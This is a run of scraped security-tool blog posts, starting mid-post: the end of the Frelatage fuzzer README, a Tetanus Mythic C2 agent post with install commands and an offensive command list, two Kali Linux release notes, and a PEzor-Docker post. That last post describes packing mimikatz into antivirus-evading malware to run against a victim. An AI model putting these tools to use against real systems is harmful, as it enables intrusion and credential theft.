my_vulnerable_library.load_file(data) input = frelatage.Input(file=True, value="input.txt") f = frelatage.Fuzzer(MyFunctionFuzz, [[input]]) f.fuzz()"><pre><code>import frelatage<br />import my_vulnerable_library<br /><br />def MyFunctionFuzz(data):<br /> my_vulnerable_library.load_file(data)<br /><br />input = frelatage.Input(file=True, value="input.txt")<br />f = frelatage.Fuzzer(MyFunctionFuzz, [[input]])<br />f.fuzz()</code></pre></div> <h4 dir="auto">Load several files to a corpus at once</h4> <p dir="auto">If you need to load several files into a corpus at once (useful if you use a large corpus) You can use the built-in function of Frelatage <code>load_corpus</code>. This function returns a list of inputs.</p> <p dir="auto"><code>load_corpus(directory: str, file_extensions: list) -> list[Input]</code></p> <ul dir="auto"> <li>directory: Subdirectory of the input directory (relative path), e.g <code>./</code>, <code>./images</code></li> <li>file_extensions: List of file extensions to include in the corpus entries, e.g. <code>["jpeg", "gif"]</code>, <code>["pdf"]</code></li> </ul> <div class="highlight highlight-source-python notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="import frelatage import my_vulnerable_library def MyFunctionFuzz(data): my_vulnerable_library.load_file(data) my_vulnerable_library.load_file(data2) # Load every every file in the ./in directory corpus_1 = frelatage.load_corpus(directory="./") # Load every .gif/.jpeg file in the ./in/images subdirectory corpus_2 = frelatage.load_corpus(directory="./images", file_extension=["gif", "jpeg"]) f = frelatage.Fuzzer(MyFunctionFuzz, [corpus_1, corpus_2]) f.fuzz()"><pre><code>import frelatage<br />import my_vulnerable_library<br /><br />def MyFunctionFuzz(data):<br /> my_vulnerable_library.load_file(data)<br /> my_vulnerable_library.load_file(data2)<br /><br /># Load every every file in the ./in directory<br />corpus_1 = frelatage.load_corpus(directory="./")<br /># Load every .gif/.jpeg file in the ./in/images subdirectory<br />corpus_2 = frelatage.load_corpus(directory="./images", file_extension=["gif", "jpeg"])<br /><br />f = frelatage.Fuzzer(MyFunctionFuzz, [corpus_1, corpus_2])<br />f.fuzz()</code></pre></div> <h4 dir="auto">Fuzz with a dictionary</h4> <p dir="auto">You can copy one or more dictionaries located <a href="https://github.com/Rog3rSm1th/Frelatage/tree/main/dictionaries" rel="nofollow" target="_blank" title="here">here</a> in the directory dedicated to dictionaries (<code>./dict</code> by default).</p> <h4 dir="auto">Differential fuzzing</h4> <p dir="auto"><a href="https://en.wikipedia.org/wiki/Differential_testing" rel="nofollow" target="_blank" title="Differental fuzzing">Differental fuzzing</a> is a popular software testing technique that attempts to detect bugs by providing the same input to multiple libraries/programs and observing differences in their behaviors. You will find an example <a href="https://github.com/Rog3rSm1th/Frelatage/blob/main/examples/json_fuzzer/json_differential_fuzzer.py" rel="nofollow" target="_blank" title="here">here</a> of a use of differential fuzzing with Frelatage with the <code>json</code> and <code>ujson</code> libraries.</p> <h4 dir="auto">Examples</h4> <p dir="auto">You can find more examples of fuzzers and corpus in the <a href="https://github.com/Rog3rSm1th/Frelatage/tree/main/examples" rel="nofollow" target="_blank" title="examples directory">examples directory</a>.</p> <ul dir="auto"> <li><a href="https://rog3rsm1th.github.io/posts/fuzzing-python-libraries-frelatage/" rel="nofollow" target="_blank" title="Fuzzing Pillow with Frelatage to find bugs and vulnerabilities">Fuzzing Pillow with Frelatage to find bugs and vulnerabilities</a></li> </ul> <h2 dir="auto">Reports</h2> <p dir="auto">Each crash is saved in the output folder (<code>./out</code> by default), in a folder named : <code>id:<crash ID>,err:<error type>,err_pos:<error>,err_file:<error file></code>.</p> <p dir="auto">The report directory is in the following form:</p> <div><pre><code> ├── out<br /> │ ├── id:<crash ID>,err:<error type>,err_file:<error file>,err_pos:<err_pos><br /> │ ├── input<br /> │ ├── 0<br /> │ ├── <inputfile1><br /> │ ├── ...<br /> │ ├── ...<br /></code></pre></div> <h4 dir="auto">Read a crash report</h4> <p dir="auto">Inputs passed to a function are serialized using the <a href="https://docs.python.org/3/library/pickle.html" rel="nofollow" target="_blank" title="pickle">pickle</a> module before being saved in the <code><report_folder>/input file</code>. It is therefore necessary to deserialize it to be able to read the contents of the file. This action can be performed with <a href="https://github.com/Rog3rSm1th/Frelatage/blob/main/scripts/read_report.py" rel="nofollow" target="_blank" title="this script">this script</a>.</p> <div><pre><code>./read_report.py input</code></pre></div> <h2 dir="auto">Configuration</h2> <p dir="auto">There are two ways to set up Frelatage:</p> <h4 dir="auto">Using the environment variables</h4> <table> <tbody><tr> <th>ENV Variable</th> <th>Description</th> <th>Possible Values</th> <th>Default Value</th> </tr> <tr> <td><strong>FRELATAGE_DICTIONARY_ENABLE</strong></td> <td>Enable the use of mutations based on <a href="https://www.kitploit.com/search/label/Dictionary" target="_blank" title="dictionary">dictionary</a> elements</td> <td><code>1</code> to enable, <code>0</code> otherwise</td> <td><code>1</code></td> </tr> <tr> <td><strong>FRELATAGE_TIMEOUT_DELAY</strong></td> <td>Delay in seconds after which a function will return a TimeoutError</td> <td><code>1</code> - <code>20</code></td> <td><code>2</code></td> </tr> <tr> <td><strong>FRELATAGE_INPUT_FILE_TMP_DIR</strong></td> <td>Temporary folder where input files are stored</td> <td>absolute path to a folder, e.g. <code>/tmp/custom_dir</code></td> <td><code>/tmp/frelatage</code></td> </tr> <tr> <td><strong>FRELATAGE_INPUT_MAX_LEN</strong></td> <td>Maximum size of an input variable in bytes</td> <td><code>4</code> - <code>1000000</code></td> <td><code>4094</code></td> </tr> <tr> <td><strong>FRELATAGE_MAX_THREADS</strong></td> <td>Maximum number of simultaneous threads</td> <td><code>8</code> - <code>50</code></td> <td><code>8</code></td> </tr> <tr> <td><strong>FRELATAGE_MAX_CYCLES_WITHOUT_NEW_PATHS</strong></td> <td>Number of cycles without new paths found after which we go to the next stage</td> <td><code>10</code> - <code>50000</code></td> <td><code>5000</code></td> </tr> <tr> <td><strong>FRELATAGE_INPUT_DIR</strong></td> <td>Directory containing the initial input files. It needs to be a relative path (to the path of the fuzzing file)</td> <td>relative path to a folder, e.g. <code>./in</code></td> <td><code>./in</code></td> </tr> <tr> <td><strong>FRELATAGE_DICTIONARY_DIR</strong></td> <td>Default directory for dictionaries. It needs to be a relative path (to the path of the fuzzing file)</td> <td>relative path to a folder, e.g. <code>./dict</code></td> <td><code>./dict</code></td> </tr> <tr> <td><strong>FRELATAGE_DEBUG_MODE</strong></td> <td>Enable the debug mode (show the error when Frelatage crash)</td> <td><code>1</code> to enable, <code>0</code> otherwise</td> <td><code>1</code></td> </tr> </tbody></table> <p dir="auto">A configuration example :</p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="export FRELATAGE_DICTIONARY_ENABLE=1 && export FRELATAGE_TIMEOUT_DELAY=2 && export FRELATAGE_INPUT_FILE_TMP_DIR="/tmp/frelatage" && export FRELATAGE_INPUT_MAX_LEN=4096 && export FRELATAGE_MAX_THREADS=8 && export FRELATAGE_MAX_CYCLES_WITHOUT_NEW_PATHS=5000 && export FRELATAGE_INPUT_DIR="./in" && export FRELATAGE_DICTIONARY_DIR="./dict" && python3 fuzzer.py"><pre><code>export FRELATAGE_DICTIONARY_ENABLE=1 &&<br />export FRELATAGE_TIMEOUT_DELAY=2 &&<br />export FRELATAGE_INPUT_FILE_TMP_DIR="/tmp/frelatage" &&<br />export FRELATAGE_INPUT_MAX_LEN=4096 &&<br />export FRELATAGE_MAX_THREADS=8 &&<br />export FRELATAGE_MAX_CYCLES_WITHOUT_NEW_PATHS=5000 &&<br />export FRELATAGE_INPUT_DIR="./in" &&<br />export FRELATAGE_DICTIONARY_DIR="./dict" &&<br />python3 fuzzer.py</code></pre></div> <h4 dir="auto">Passing arguments to the fuzzer</h4> <div class="highlight highlight-source-python notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="import frelatage def myfunction(input1_string, input2_int): pass input1 = frelatage.Input(value="initial_value") input2 = frelatage.Input(value=2) f = frelatage.Fuzzer( # The method you want to fuzz method=myfunction, # Corpus corpus=[[input1], [input2]], # Number of threads threads_count=8, # Exceptions that will be taken into account exceptions_whitelist=(OSError), # Exceptions that will not be taken into account exceptions_blacklist=(), # <a title="Directory" href="https://www.kitploit.com/search/label/Directory">Directory</a> where the error reports will be stored output_directory="./out", # Enable or disable silent mode silent=False ) f.fuzz()"><pre><code>import frelatage <br /><br />def myfunction(input1_string, input2_int):<br /> pass<br /><br />input1 = frelatage.Input(value="initial_value")<br />input2 = frelatage.Input(value=2)<br /><br />f = frelatage.Fuzzer(<br /> # The method you want to fuzz<br /> method=myfunction,<br /> # Corpus<br /> corpus=[[input1], [input2]],<br /> # Number of threads<br /> threads_count=8,<br /> # Exceptions that will be taken into account<br /> exceptions_whitelist=(OSError),<br /> # Exceptions that will not be taken into account<br /> exceptions_blacklist=(),<br /> # Directory where the error reports will be stored<br /> output_directory="./out",<br /> # Enable or disable silent mode<br /> silent=False<br />)<br />f.fuzz()</code></pre></div> <h2 dir="auto">Risks</h2> <p dir="auto">Please keep in mind that, similarly to many other computationally-intensive tasks, fuzzing may put strain on your <a href="https://www.kitploit.com/search/label/Hardware" target="_blank" title="hardware">hardware</a> and on the OS. In particular:</p> <ul dir="auto"> <li> <p dir="auto">Your CPU will run hot and will need adequate cooling. In most cases, if cooling is insufficient or stops working properly, CPU speeds will be automatically throttled. That said, especially when fuzzing on less suitable hardware (laptops, smartphones, etc), it's not entirely impossible for something to blow up.</p> </li> <li> <p dir="auto">Targeted programs may end up erratically grabbing gigabytes of memory or filling up <a href="https://www.kitploit.com/search/label/Disk%20Space" target="_blank" title="disk space">disk space</a> with junk files. Frelatage tries to enforce basic memory limits, but can't prevent each and every possible mishap. The bottom line is that you shouldn't be fuzzing on systems where the prospect of data loss is not an acceptable risk.</p> </li> <li> <p dir="auto">Fuzzing involves billions of reads and writes to the filesystem. On modern systems, this will be usually heavily cached, resulting in fairly modest "physical" I/O - but there are many factors that may alter this equation. It is your responsibility to monitor for potential trouble; with very heavy I/O, the lifespan of many HDDs and SSDs may be reduced.</p> <p dir="auto">A good way to monitor disk I/O on Linux is the 'iostat' command:</p> </li> </ul> <div><pre><code> $ iostat -d 3 -x -k [...optional disk ID...]</code></pre></div> <h2 dir="auto"><div>About Me/Hire me</div></h2> <p dir="auto">I am Rog3rSm1th, I am 21 years old and I'm a French computer and <a href="https://www.kitploit.com/search/label/Cybersecurity" target="_blank" title="cybersecurity">cybersecurity</a> enthusiast. I like developing tools (OSINT, Fuzzing...) and playing CTFs/Wargames. To learn more about me and my projects, juste click <a href="https://github.com/Rog3rSm1th/Rog3rSm1th" rel="nofollow" target="_blank" title="here">here</a>.</p> <p dir="auto">➜ If you want to hire me for one of your projects (Programming, cybersecurity...), just contact me at <a href="mailto:r0g3r5@protonmail.com" rel="nofollow" target="_blank" title="r0g3r5@protonmail.com">r0g3r5@protonmail.com</a> and we will assess your needs together.</p> <h2 dir="auto">Contact</h2> <p dir="auto">for any remark, suggestion, bug report, or if you found a bug using Frelatage, you can contact me at <a href="mailto:r0g3r5@protonmail.com" rel="nofollow" target="_blank" title="r0g3r5@protonmail.com">r0g3r5@protonmail.com</a> or on twitter <a href="https://twitter.com/Rog3rSm1th" rel="nofollow" target="_blank" title="@Rog3rSm1th">@Rog3rSm1th</a></p> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/Rog3rSm1th/Frelatage" rel="nofollow" target="_blank" title="Download Frelatage">Download Frelatage</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-5631385508025307542022-05-21T08:30:00.009-04:002022-05-21T08:30:00.238-04:00Tetanus - Mythic C2 Agent Targeting Linux And Windows Hosts Written In Rust<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi94BWPJjKMo7YqWhvHVqFCUF6MPVYoJEWK6vJ_S6SJA4UyKJJYCLetMBWPW-bTSK1NH_te-0l9tPy8VCSwGboqZ6MtuYcnbvemfsnVR3fDQxnrmu2MZC9j6kH9oD3IRVSxwKRL4eHzKIoWYhxVIumpi7HPk9GXp44lhPXya7I-pY_vCVmC2g-lPdCw/s460/tetanus.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="422" data-original-width="460" height="368" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi94BWPJjKMo7YqWhvHVqFCUF6MPVYoJEWK6vJ_S6SJA4UyKJJYCLetMBWPW-bTSK1NH_te-0l9tPy8VCSwGboqZ6MtuYcnbvemfsnVR3fDQxnrmu2MZC9j6kH9oD3IRVSxwKRL4eHzKIoWYhxVIumpi7HPk9GXp44lhPXya7I-pY_vCVmC2g-lPdCw/w400-h368/tetanus.png" width="400" /></a></div><p><br /></p> <p dir="auto">Tetanus is a <a href="https://www.kitploit.com/search/label/Windows" target="_blank" title="Windows">Windows</a> and Linux C2 agent written in rust.</p> <h1 dir="auto">Installation</h1> <p dir="auto">To install Tetanus, you will need <a href="https://github.com/its-a-feature/Mythic" rel="nofollow" target="_blank" title="Mythic">Mythic</a> set up on a machine.</p> <p dir="auto">In the Mythic root directory, use <code>mythic-cli</code> to install the agent.</p> <div class="highlight highlight-source-shell position-relative overflow-auto" data-snippet-clipboard-copy-content="sudo ./mythic-cli install github https://github.com/MythicAgents/tetanus sudo ./mythic-cli <a title=" href="https://www.kitploit.com/search/label/Payload" payload="">payload start tetanus"><pre><code>sudo ./mythic-cli install github https://github.com/MythicAgents/tetanus<br />sudo ./mythic-cli payload start tetanus</code></pre></div> <p dir="auto">Tetanus supports the http C2 profile:</p> <div class="highlight highlight-source-shell position-relative overflow-auto" data-snippet-clipboard-copy-content="sudo ./mythic-cli install github https://github.com/MythicC2Profiles/http sudo ./mythic-cli c2 start http"><pre><code>sudo ./mythic-cli install github https://github.com/MythicC2Profiles/http<br />sudo ./mythic-cli c2 start http</code></pre></div><span><a name='more'></a></span><div><br /><h2 dir="auto">Features</h2> <ul dir="auto"> <li>Background job management</li> <li>Built-in ssh client <ul dir="auto"> <li>Connect to a machine and download/upload files between that machine and Mythic</li> <li>Get <a href="https://www.kitploit.com/search/label/Directory" target="_blank" title="directory">directory</a> listings from machines using sftp</li> <li>Spawn agents on machines using ssh</li> <li>ssh-agent hijacking</li> </ul> </li> <li>Streaming portscan</li> <li>Stand up TCP redirectors</li> </ul> <h2 dir="auto">Future Additions</h2> <ul dir="auto"> <li>v0.2.0 <ul class="contains-task-list"> <li class="task-list-item"><input class="task-list-item-checkbox" disabled="" id="" type="checkbox" /> Socks proxying</li> <li class="task-list-item"><input class="task-list-item-checkbox" disabled="" id="" type="checkbox" /> Windows token manipulation</li> <li class="task-list-item"><input class="task-list-item-checkbox" disabled="" id="" type="checkbox" /> More browser script integration</li> <li class="task-list-item"><input class="task-list-item-checkbox" disabled="" id="" type="checkbox" /> DNS C2 profile</li> <li class="task-list-item"><input class="task-list-item-checkbox" disabled="" id="" type="checkbox" /> p2p capabilities</li> <li class="task-list-item"><input class="task-list-item-checkbox" disabled="" id="" type="checkbox" /> In <a href="https://www.kitploit.com/search/label/Memory" target="_blank" title="memory">memory</a> shellcode execution <code>execute-shellcode</code></li> </ul> </li> </ul> <h2 dir="auto">General Commands</h2> <table> <tbody><tr> <th>Command</th> <th>Syntax</th> <th>Description</th> </tr> <tr> <td>cat</td> <td><code>cat [file]</code></td> <td>Output the contents of a file.</td> </tr> <tr> <td>cd</td> <td><code>cd [new directory]</code></td> <td>Change directory.</td> </tr> <tr> <td>cp</td> <td><code>cp [source] [destination]</code></td> <td>Copy a file from [source] to [destination].</td> </tr> <tr> <td>download</td> <td><code>download [path]</code></td> <td>Download a file from the target system (supports relative paths).</td> </tr> <tr> <td>exit</td> <td><code>exit</code></td> <td>Exit the agent.</td> </tr> <tr> <td>getenv</td> <td><code>getenv</code></td> <td>Get the current environment variables.</td> </tr> <tr> <td>getprivs</td> <td><code>getprivs</code></td> <td>Get the privileges of the agent session.</td> </tr> <tr> <td>jobkill</td> <td><code>jobkill [job id]</code></td> <td>Shutdown a running background job.</td> </tr> <tr> <td>jobs</td> <td><code>jobs</code></td> <td>List currently running background jobs.</td> </tr> <tr> <td>ls</td> <td><code>ls [directory]</code></td> <td>List files or directories (supports relative paths).</td> </tr> <tr> <td>mkdir</td> <td><code>mkdir [directory]</code></td> <td>Make a new directory.</td> </tr> <tr> <td>mv</td> <td><code>mv [source] [destination]</code></td> <td>Move a file from [source] to [destination] (supports relative paths).</td> </tr> <tr> <td>portscan</td> <td><code>portscan [popup]</code></td> <td>Scan a list of IPs for open ports.</td> </tr> <tr> <td>ps</td> <td><code>ps</code></td> <td>Get a list of currently running processes.</td> </tr> <tr> <td>pwd</td> <td><code>pwd</code></td> <td>Print working directory.</td> </tr> <tr> <td>redirect</td> <td><code>redirect [<bindhost>:<bindport>:<connecthost>:<connectport>]</code></td> <td>Setup a TCP <a href="https://www.kitploit.com/search/label/Redirector" target="_blank" title="redirector">redirector</a> on the remote system.</td> </tr> <tr> <td>rm</td> <td><code>rm [path]</code></td> <td>Remove a file or directory (supports relative paths).</td> </tr> <tr> <td>setenv</td> <td><code>setenv [name] [value]</code></td> <td>Set environment variable [name] to [value].</td> </tr> <tr> <td>shell</td> <td><code>shell [command]</code></td> <td>Run a shell command with <code>bash -c</code> on Linux or <code>cmd.exe /c</code> on Windows in a new thread.</td> </tr> <tr> <td>sleep</td> <td><code>sleep [interval][units] [jitter]</code></td> <td>Set the sleep interval and jitter (supports unit suffixing).</td> </tr> <tr> <td>ssh</td> <td><code>ssh [popup]</code></td> <td>Use ssh to execute commands, download/upload files or grab directory listings.</td> </tr> <tr> <td>ssh-agent</td> <td><code>ssh-agent [-c <socket>] [-d] [-l]</code></td> <td>Connect to running ssh agent sockets on the host or list identities.</td> </tr> <tr> <td>ssh-spawn</td> <td><code>ssh-spawn [popup]</code></td> <td>Spawn a Mythic agent on a remote host using ssh.</td> </tr> <tr> <td>unsetenv</td> <td><code>unsetenv [var]</code></td> <td>Unset an environment variable.</td> </tr> <tr> <td>upload</td> <td><code>upload [popup]</code></td> <td>Upload a file to the host machine.</td> </tr> </tbody></table> <h3 dir="auto">Windows-specific Commands</h3> <table> <tbody><tr> <th>Command</th> <th>Syntax</th> <th>Description</th> </tr> <tr> <td>powershell</td> <td><code>powershell [command]</code></td> <td>Run a command using <code>powershell.exe /c</code> in a new thread.</td> </tr> </tbody></table> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/MythicAgents/tetanus" rel="nofollow" target="_blank" title="Download Tetanus">Download Tetanus</a></span></b></div></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-61418413464236827092022-05-17T00:57:00.000-04:002022-05-17T00:57:02.168-04:00Kali Linux 2022.2 - Penetration Testing and Ethical Hacking Linux Distribution<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhiTtZYI97lcNISgbv6KTnLdshFnFSINgQKZz4t-_pVsVzx0nu3jsDwgrMFpj_PI4qQzy-hB6MN13RyHlyU7Nxz0oWbOtOJjuwINGmxsaXLbf2-a-zvJEcU8omMaPzEwWWHW9Uz_5vuyngv36ADG843jjC2AsWp4CT7T6HrfkliCtjmyVRvdDmmM_MO/s1200/banner-2022.2-release.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="628" data-original-width="1200" height="334" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhiTtZYI97lcNISgbv6KTnLdshFnFSINgQKZz4t-_pVsVzx0nu3jsDwgrMFpj_PI4qQzy-hB6MN13RyHlyU7Nxz0oWbOtOJjuwINGmxsaXLbf2-a-zvJEcU8omMaPzEwWWHW9Uz_5vuyngv36ADG843jjC2AsWp4CT7T6HrfkliCtjmyVRvdDmmM_MO/w640-h334/banner-2022.2-release.jpg" width="640" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div><p></p>
Time for another Kali Linux release! – Kali Linux 2022.2. This release has various impressive updates.<span><a name='more'></a></span><div><br /></div><div>
<p>The summary of the <a href="https://bugs.kali.org/changelog_page.php">changelog</a> since the <a href="https://www.kali.org/blog/kali-linux-2022-1-release/">2022.1 release from February 2022</a> is:</p><ul><li><a href="https://www.kali.org/blog/kali-linux-2022-2-release/#gnome-42"><strong>GNOME 42</strong></a> - Major release update of the popular desktop environment</li><li><a href="https://www.kali.org/blog/kali-linux-2022-2-release/#kde-plasma-524"><strong>KDE Plasma 5.24</strong></a> - Version bump with a more polished experience</li><li><a href="https://www.kali.org/blog/kali-linux-2022-2-release/#other-desktop-enhancements"><strong>Multiple desktop enhancements</strong></a>
- Disabled motherboard beep on Xfce, alternative panel layout for ARM,
better support for VirtualBox shared folders, and lots more</li><li><a href="https://www.kali.org/blog/kali-linux-2022-2-release/#tweaks-for-the-terminal"><strong>Tweaks for the terminal</strong></a> - Enhanced Zsh <code>syntax-highlighting</code>, inclusion of <code>Python3-pip</code> and <code>Python3-virtualenv</code> by default</li><li><a href="https://www.kali.org/blog/kali-linux-2022-2-release/#hollywood-activate--kali-screensaver-april-fools"><strong>April fools - Hollywood mode</strong></a> - Awesome screensaver</li><li><a href="https://www.kali.org/blog/kali-linux-2022-2-release/#kali-unkaputtbar"><strong>Kali Unkaputtbar</strong></a> - BTRFS snapshot support for Kali</li><li><a href="https://www.kali.org/blog/kali-linux-2022-2-release/#win-kex-31"><strong>Win-KeX 3.1</strong></a> - sudo support for GUI apps</li><li><a href="https://www.kali.org/blog/kali-linux-2022-2-release/#new-tools-in-kali"><strong>New tools</strong></a> - Various new tools added</li><li><a href="https://www.kali.org/blog/kali-linux-2022-2-release/#kali-nethunter-updates"><strong>WPS attacks in Kali NetHunter</strong></a> - Added WPS attacks tab to the NetHunter app</li></ul><br />
<b>More info <a href="https://www.kali.org/blog/kali-linux-2022-2-release/" target="_blank">here</a>.</b><br /><br />
<br />
<div style="text-align: center;">
<b><span style="font-size: x-large;"><a class="kiploit-download" href="https://www.kali.org/get-kali/" rel="nofollow" target="_blank" title="Download Kali Linux">Download Kali Linux 2022.2</a></span></b></div></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-38604361385776623652022-05-06T08:30:00.001-04:002022-05-06T08:30:00.274-04:00PEzor-Docker - With The Help Of This Docker Image, You Can Easily Access PEzor On Your System!<p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEhHsckeiF1v5WX0Uu9SCE_OM4fNbfFt7YjLzq62-RCB3tael1hB5SScgVryMUgGPZ00LcncujG10PTQNg31w0fltsmos2YfEHvvFkCL6roF5LGu4vEqUIpOXnb_QDAl_eG9JVL9YUaRGQvpKVXV1pr-AS0RmpTmJNS1lsoJ6P-4RJ_EjfeSyqDVCYPJ" style="text-align: left;"><img alt="" border="0" height="352" id="BLOGGER_PHOTO_ID_7093768154029607282" src="https://blogger.googleusercontent.com/img/a/AVvXsEhHsckeiF1v5WX0Uu9SCE_OM4fNbfFt7YjLzq62-RCB3tael1hB5SScgVryMUgGPZ00LcncujG10PTQNg31w0fltsmos2YfEHvvFkCL6roF5LGu4vEqUIpOXnb_QDAl_eG9JVL9YUaRGQvpKVXV1pr-AS0RmpTmJNS1lsoJ6P-4RJ_EjfeSyqDVCYPJ=w640-h352" width="640" /></a></p> <p dir="auto"><br /></p> <p dir="auto">With the help of this <a href="https://www.kitploit.com/search/label/Kali%20Linux" target="_blank" title="kali linux">kali linux</a> image, you can easily <a href="https://www.kitploit.com/search/label/Access" target="_blank" title="access">access</a> PEzor on your system!</p> <p dir="auto">Basically, this image is built from the kalilinux/kali-rolling image and then the PEzor shellcode and PE <a href="https://www.kitploit.com/search/label/Packer" target="_blank" title="packer">packer</a> is installed on top of it. Sometimes, it's vital to have access to PEzor, specially in a post exploit phase, but installing it on a host or a VM is a time-consuming task due to the dependencies that are required. Having said that, this docker image is created to solve this problem and provide a quick way to access PEzor.</p> <p dir="auto">P.S. All the credits for the wonderful PEzor tool are reserved for <a href="https://github.com/phra" rel="nofollow" target="_blank" title="@phra">@phra</a> .</p><span><a name='more'></a></span><p dir="auto"><br /></p> <h1 dir="auto">Disclaimer</h1> <p dir="auto">This docker image is only for educational purposes and ethical uses! Any misuse of this image is totally on your own risk.</p> <h1 dir="auto">About PEzor</h1> <p dir="auto">With the help of this incredible tool, you can create FUD malwares that are capable of <a href="https://www.kitploit.com/search/label/Bypassing" target="_blank" title="bypassing">bypassing</a> most of the well-known AVs. For instance, you can pack the "mimikatz" executable file with the help of PEzor and then run it against victim's system for a full mem dump without any problem! </p><div></div> <h1 dir="auto">How to use</h1> <p dir="auto"><em><b> NOTE: You need to have docker installed on your system. </b></em></p> <div><pre class="notranslate"><code class="notranslate">docker pull https://hub.docker.com/r/4d0niis/pezor_included_kali:1.0 </code></pre></div> <div><pre class="notranslate"><code class="notranslate">docker run -it 4d0niis/pezor_included_kali:1.0 /bin/bash </code></pre></div> <div><pre class="notranslate"><code class="notranslate">PEzor <COMMANDS> </code></pre></div> <p style="text-align: center;"><a href="https://raw.githubusercontent.com/4D0niiS/PEzor-Docker/main/PEzor_docker.png?token=GHSAT0AAAAAABSJNQCE2IVME72JKYJYXYGOYRI2I5Q" rel="nofollow" target="_blank" title="With the help of this docker image, you can easily access PEzor on your system! (9)"></a><a href="https://blogger.googleusercontent.com/img/a/AVvXsEhHsckeiF1v5WX0Uu9SCE_OM4fNbfFt7YjLzq62-RCB3tael1hB5SScgVryMUgGPZ00LcncujG10PTQNg31w0fltsmos2YfEHvvFkCL6roF5LGu4vEqUIpOXnb_QDAl_eG9JVL9YUaRGQvpKVXV1pr-AS0RmpTmJNS1lsoJ6P-4RJ_EjfeSyqDVCYPJ"><img alt="" border="0" height="352" id="BLOGGER_PHOTO_ID_7093768154029607282" src="https://blogger.googleusercontent.com/img/a/AVvXsEhHsckeiF1v5WX0Uu9SCE_OM4fNbfFt7YjLzq62-RCB3tael1hB5SScgVryMUgGPZ00LcncujG10PTQNg31w0fltsmos2YfEHvvFkCL6roF5LGu4vEqUIpOXnb_QDAl_eG9JVL9YUaRGQvpKVXV1pr-AS0RmpTmJNS1lsoJ6P-4RJ_EjfeSyqDVCYPJ=w640-h352" width="640" /></a></p> <h1 dir="auto">References</h1> <p dir="auto"><a href="https://hub.docker.com/r/4d0niis/pezor_included_kali" rel="nofollow" target="_blank" title="https://hub.docker.com/r/4d0niis/pezor_included_kali">https://hub.docker.com/r/4d0niis/pezor_included_kali</a></p> <p dir="auto"><a href="https://github.com/phra/PEzor" rel="nofollow" target="_blank" title="https://github.com/phra/PEzor">https://github.com/phra/PEzor</a></p> <p dir="auto"><a href="https://hub.docker.com/r/kalilinux/kali-rolling" rel="nofollow" target="_blank" title="https://hub.docker.com/r/kalilinux/kali-rolling">https://hub.docker.com/r/kalilinux/kali-rolling</a></p> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/4D0niiS/PEzor-Docker" rel="nofollow" target="_blank" title="Download PEzor-Docker">Download PEzor-Docker</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-12680483986125924422022-02-16T01:28:00.001-03:002022-02-16T01:28:17.791-03:00Kali Linux 2022.1 - Penetration Testing and Ethical Hacking Linux Distribution<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEh6iTYLXs1cdlD8_xPVErU9WeNhKR8btBxU7jmXBX5YjtdnSFy4STQW7uD3rmbGe9k8nJPDpojqWqUAm1kMhzrik87SVPNfN-CEYpDkgET_UC6FEawMOozkRmgCYZNLEPF_mTUyyyEuwxiQJCrODs9UV5fyQw3JP1_jgd9bxJ6XDjzW0dR-x9oEM0cz=s1200" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="628" data-original-width="1200" height="334" src="https://blogger.googleusercontent.com/img/a/AVvXsEh6iTYLXs1cdlD8_xPVErU9WeNhKR8btBxU7jmXBX5YjtdnSFy4STQW7uD3rmbGe9k8nJPDpojqWqUAm1kMhzrik87SVPNfN-CEYpDkgET_UC6FEawMOozkRmgCYZNLEPF_mTUyyyEuwxiQJCrODs9UV5fyQw3JP1_jgd9bxJ6XDjzW0dR-x9oEM0cz=w640-h334" width="640" /></a></div><p><br /></p><p></p>
Time for another Kali Linux release! – Kali Linux 2022.1. This release has various impressive updates.<span><a name='more'></a></span><div><br /></div><div>
<p>The summary of the <a href="https://bugs.kali.org/changelog_page.php">changelog</a> since the <a href="https://www.kali.org/blog/kali-linux-2021-4-release/">2021.4 release from December 2021</a> is:</p>
<ul>
<li><strong><a href="https://www.kali.org/blog/kali-linux-2022-1-release/#visual-refresh-theme-updates">Visual Refresh</a></strong> - Updated wallpapers and GRUB theme</li>
<li><strong><a href="https://www.kali.org/blog/kali-linux-2022-1-release/#shell-prompt-changes">Shell Prompt Changes</a></strong> - Visual improvements to improve readability when copying code</li>
<li><strong><a href="https://www.kali.org/blog/kali-linux-2022-1-release/#refreshed-browser-landing-page">Refreshed Browser Landing Page</a></strong> - Firefox and Chromium homepage has had a makeover to help you access everything Kali you need</li>
<li><strong><a href="https://www.kali.org/blog/kali-linux-2022-1-release/#kali-everything-image-everything-in-one-place">Kali Everything Image</a></strong> - An all-packages-in-one solution now available to download</li>
<li><strong><a href="https://www.kali.org/blog/kali-linux-2022-1-release/#kali-tweaks-legacy-ssh-made-easy">Kali-Tweaks Meets SSH</a></strong> - Connect to old SSH servers using legacy SSH protocols and ciphers</li>
<li><strong><a href="https://www.kali.org/blog/kali-linux-2022-1-release/#vmware-i3-improvements">VMware i3 Improvements</a></strong> - Host-guest features properly work now on i3</li>
